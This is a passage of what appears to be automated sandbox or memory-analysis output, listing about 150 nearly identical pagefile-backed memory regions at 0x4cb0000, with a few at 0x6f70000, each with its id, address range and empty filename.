	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3686
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3687
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3688
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3689
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3690
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3691
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3692
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3693
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3694
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3695
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3696
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3697
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3698
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3699
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3700
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3701
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3702
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3703
	        start_va = 0x4cb0000
	          end_va = 0x4cb8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3704
	        start_va = 0x6f70000
	          end_va = 0x776ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000006f70000"
	        filename = ""

Region:
	              id = 3705
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3706
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3707
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3708
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3709
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3710
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3711
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3712
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3713
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3714
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3715
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3716
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3717
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3718
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3719
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3720
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3721
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3722
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3723
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3724
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3725
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3726
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3727
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3728
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3729
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3730
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3731
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3732
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3733
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3734
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3735
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3736
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3737
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3738
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3739
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3740
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3741
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3742
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3743
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3744
	        start_va = 0x4cb0000
	          end_va = 0x4cb8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3745
	        start_va = 0x6f70000
	          end_va = 0x776ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000006f70000"
	        filename = ""

Region:
	              id = 3746
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3747
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3748
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3749
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3750
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3751
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3752
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3753
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3754
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3755
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3756
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3757
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3758
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3759
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3760
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3761
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3762
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3763
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3764
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3765
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3766
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3767
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3768
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3769
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3770
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3771
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3772
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3773
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3774
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3775
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3776
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3777
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3778
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3779
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3780
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3781
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3782
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3783
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3784
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3785
	        start_va = 0x4cb0000
	          end_va = 0x4cb8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3786
	        start_va = 0x6f70000
	          end_va = 0x776ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000006f70000"
	        filename = ""

Region:
	              id = 3787
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3788
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3789
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3790
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3791
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3792
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3793
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3794
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3795
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3796
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3797
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3798
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3799
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3800
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3801
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3802
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3803
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3804
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3805
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3806
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3807
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3808
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3809
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3810
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3811
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3812
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3813
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3814
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3815
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3816
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3817
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3818
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3819
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3820
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3821
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3822
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3823
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3824
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3825
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3826
	        start_va = 0x4cb0000
	          end_va = 0x4cb8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3827
	        start_va = 0x6f70000
	          end_va = 0x776ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000006f70000"
	        filename = ""

Region:
	              id = 3828
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3829
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3830
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3831
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3832
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3833
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3834
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3835
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3836
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
